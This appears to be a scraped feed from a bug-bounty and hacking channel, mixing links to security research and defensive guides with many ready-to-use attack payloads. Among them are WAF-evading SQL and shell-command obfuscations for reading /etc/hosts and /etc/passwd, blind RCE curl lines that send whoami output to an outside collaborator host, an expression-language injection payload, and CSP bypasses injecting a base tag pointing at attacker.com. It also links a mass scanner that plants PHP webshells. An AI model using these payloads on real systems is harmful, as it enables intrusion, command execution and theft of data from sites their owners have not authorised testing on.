2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
⚡️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogicSELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Hey Hunter’s,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" http://BURP_LINK"
Others format you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE.
Now you hit follow me for more: x.com/darkshadow2bd
Guys, I need ur review... I have created a ai to generate a vibe coding prompt.. And made it open sourced please do check and let me know the review..
https://github.com/Addy-shetty/Vibe-Prompting
Have one question... Do any here learning vibe coding...
Читать полностью…
#DevOps
#Tech_book
"Java Spring Bug Hunter's Secure Coding Playbook:
Java Spring Security with SAST Arsenal from Semgrep to Claude", 2025.
// Java Spring security in 2025 - a high-stakes game where a single misconfigured bean or an overlooked deserialization endpoint can become the gateway for sophisticated attackers...
#tools
#WLAN_Security
"Crowdsourcing Bluetooth identity, to understand Bluetooth vulnerability", DistrictCon 2025.
]-> Repo
]-> BlueTooth Information Data Exchange
]-> Blue2thprinting Code
// Disclaimer
#AppSec
#WebApp_Security
1. Critical UXSS in Opera Browser
renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555" rel="nofollow">https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555
// Leak open tab URLs (flag included)
2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more
// deep dive into Electron CVE-2025-55305
3. RCE though vulnerability in Facebook Messenger for Windows
https://www.vulnano.com/2025/09/remote-code-execution-though.html
// Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H
#Space_Security
#WLAN_Security
"GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025.
// ..we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations
See also:
]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)
Free Recon Course and Methodology For Bug Bounty Hunters
https://www.youtube.com/watch?v=evyxNUzl-HA
Web Cache Poisoning
small✅ checklist
Read Full Article : Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.
• Check Vary and target UA-specific poisoning when relevant.
• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache
• Test .css / .js extension flip on sensitive endpoints (CSPT)
• Seed cache via Burp parallel requests (first .js then main HTML)
• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status
• Run delimiter discovery (append random suffix → insert delimiter → compare).
🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇
• ⏱️ Timing-delay
• 🔁 Subdomain-rotation
• 🏷️ Header-correlation
Read the full Medium guide ➡️ Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015" rel="nofollow">https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
First, understand this :
Content Security Policy = No XSS
It just means "XSS with extra steps"
🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec
Here are the 👇 5 deadly mistakes developers make:
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟭: '𝘂𝗻𝘀𝗮𝗳𝗲-𝗶𝗻𝗹𝗶𝗻𝗲'
If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'
Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟮: 𝗪𝗶𝗹𝗱𝗰𝗮𝗿𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀 (*.𝗴𝗼𝗼𝗴𝗹𝗲.𝗰𝗼𝗺)
"It's Google, what could go wrong?"
Everything.
This JSONP endpoint on Google works on tons of apps: http://
accounts.google.com/o/oauth2/revoke?callback=alert
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟯: 𝗠𝗶𝘀𝘀𝗶𝗻𝗴 𝗯𝗮𝘀𝗲-𝘂𝗿𝗶
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">
Now ALL relative script paths load from your domain.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟰: 𝗙𝗶𝗹𝗲 𝗨𝗽𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗪𝗵𝗶𝘁𝗲𝗹𝗶𝘀𝘁𝗲𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀
Policy: script-src 'self' http://cdn.example.com
If you can upload files to that CDN → game over.
upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟱: 𝗧𝗿𝘂𝘀𝘁𝗶𝗻𝗴 𝗖𝗗𝗡𝘀 𝘄𝗶𝘁𝗵 𝗢𝗹𝗱 𝗟𝗶𝗯𝗿𝗮𝗿𝗶𝗲𝘀
AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.
Check http://ajax.googleapis.com for old versions. This works more often than you'd think.
𝗧𝗵𝗶𝘀 𝗶𝘀 𝗷𝘂𝘀𝘁 𝘁𝗵𝗲 𝗯𝗲𝗴𝗶𝗻𝗻𝗶𝗻𝗴.
𝗣𝗮𝗿𝘁 𝟮: Advanced nonce exploitation, AngularJS escapes, service workers
𝗣𝗮𝗿𝘁 𝟯: DOM clobbering, mutation XSS, scriptless attacks
𝗙𝘂𝗹𝗹 𝗴𝘂𝗶𝗱𝗲 + 𝘁𝗲𝘀𝘁𝗶𝗻𝗴 𝗰𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁:
Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699" rel="nofollow">https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
This book is for for understanding how API's works and developed
Читать полностью…
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know guy's you all wants more or not like that?
Hey Hunter’s,
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
✅POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
New bug bounty resource 🚀
The Cache Poisoning Bible - Part 1: Advanced Fundamentals
Everything I wish I knew when I started:
• Cache key architectures
• CDN comparison guide
• Advanced detection methods
• Real-world patterns
Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9" rel="nofollow">https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9
#DFIR
#AIOps
#MLSecOps
#RAG_Security
AI Incident Response Framework, V1.0
https://github.com/cosai-oasis/ws2-defenders/blob/main/incident-response/AI%20Incident%20Response.md
// This guides defenders on proactively minimizing the impact of AI system exploitation. It details how to maintain auditability, resiliency, and rapid recovery even when a system is compromised by advanced threat actors. Also explores the unique challenges of AI incident response, emphasizing the role of forensic investigation and the complications introduced by agentic architectures, while providing concrete steps to manage this new complexity
#exploit
"Exploiting the Impossible:
A Deep Dive into A Vulnerability Apple Deems Unexploitable", NullCon Berlin 2025.
]-> https://jhftss.github.io/Exploiting-the-Impossible
]-> PoC
// race condition in Apple core file-copy API (CVE-2024-54566, CVE-2025-43220)
#DevOps
#MLSecOps
#Whitepaper
"DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025.
// This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use
#AIOps
#MLSecOps
"Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025.
]-> Prompt injection mitigation
// We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation
https://github.com/DivyanshGoel259/Churn-Prediction
Finally our first ANN project in which we trained a model for "Churn Prediction"
Part - 2
Web Cache Poisoning
Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.
Read 5 practical PoCs & seeding recipes →
Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
Web Cache Poisoning Tips
Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.
Make the app include your input in the key → you control cached output.
Read Full Article : Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48
How to Hack JWT using Burp Suite?
https://payatu.com/blog/jwt-vulnerabilities/
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
🌐A big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more🧠
Online tools for search info about:
- exploit⭐️
- vulnerabilities⭐️
- people⭐️
- emails⭐️
- phone numbers⭐️
- domains⭐️
- certificates⭐️
and more❤️.
https://github.com/edoardottt/awesome-hacker-search-engines
Learn Hacking from Basic to Pro❤️